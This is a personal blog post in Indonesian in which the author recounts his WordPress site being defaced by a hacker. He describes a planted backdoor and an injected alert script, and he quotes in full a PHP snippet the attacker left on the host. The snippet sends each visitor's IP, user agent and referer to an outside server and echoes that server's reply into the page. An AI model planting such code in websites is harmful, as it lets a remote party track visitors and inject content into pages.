Blog Saya di Hack

hacked by Hmei7
hacked by Hmei7
Gambar di samping adalah screenshoot bahwa beberapa waktu yang lalu blog saya ini dihack oleh seorang hacker Indonesia dengan nick Hmei7. Saya terkejut, tetapi untunglah hacker tersebut tidak mendeface beberapa website lain yang berada satu hosting dengan saya.

Sepertinya memang target hacker tersebut adalah website saya, di sana dia juga meletakkan sebuah backdoor. Tidak saya hapus sih backdoornya cuma permissionnya saya ganti ke 000 saja dulu biar tidak bisa diakses.

Hacker ini baik hati, dia mengingatkan saya kepada beberapa file yang belum sempat saya hapus karena memang teramat jarang saya login ke cpanel, dengan wordpress saya mengurusnya semua via dashboard.

Jika Anda melihat source code website ini, akan terlihat script <script>alert('carding haram bozz ...')</script> yang telah saya berikan komentar agar tidak muncul di permukaan. Ada juga script php untuk menuliskan JavaScript, tetapi sudah saya berikan baris komentar. Sengaja belum saya hapus karena biar terasa nostalgia bahwa blogs saya ini sudah dihack oleh sang hacker.

Tetapi ada satu yang tidak aku suka, dia meletakkan sebuah script lain di website utama hosting ini (blog ini menggunakan adds on domain, saya meminjam hosting teman saya). Berikut ini adalah scriptnya:

< ?php
$url = "http://planerknivesdirect.com/images/12/request.php?ip".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
echo $answer;
}
?>

Saya tidak tahu apa isi dari request.php file di atas, apakah cuma sekedar log berapa orang yang mengkunjungi website, atau ada yang lainnya. Dilihat dari query-nya, sepertinya itu cuma sebuah log dari IP sekian menggunakan browser apa dengan parameter Referer dari website mana.

Hal yang menarik lainnya adalah, bahwa baik blog saya ini maupun planerknivesdirect.com menggunakan jasa layanan hosting yang sama, yaitu webhostingpad.com. Hanya saja, baiquni.net (69.65.3.130) dan planerknivesdirect.com (69.65.33.57) memiliki IP Address yang berbeda.

Syukurlah, semua subdomain baiquni.net sudah dideface, namun hacker cuma mendeface index.php saja, bisa terlihat dari file last modified di cpanel. Hacker tersebut tidak menyentuh directory yang lainnya (Agak takut bagi saya jika hacker tersebut ternyata memasukkan backdoor di directory wp-content/ sehingga saya bingung pada bagian mana dia menaruhnya).

Yang paling penting lagi adalah: TIDAK ADA FILE YANG DIDELETE (tidak benar juga sih, ada beberapa index.php yang ditimpa dengan file deface sehingga menghilangkan file tersebut).

But, anyway saya merasa beruntung telah diingatkan, juga tidak adanya kerusakan yang berarti. Saya berharap hacker tersebut mau mem-patch blog saya ini dari file yang vuln, sehingga ke depan kejadian serupa tidak terulang. Bagaimana brother Hmei7, bersediakah?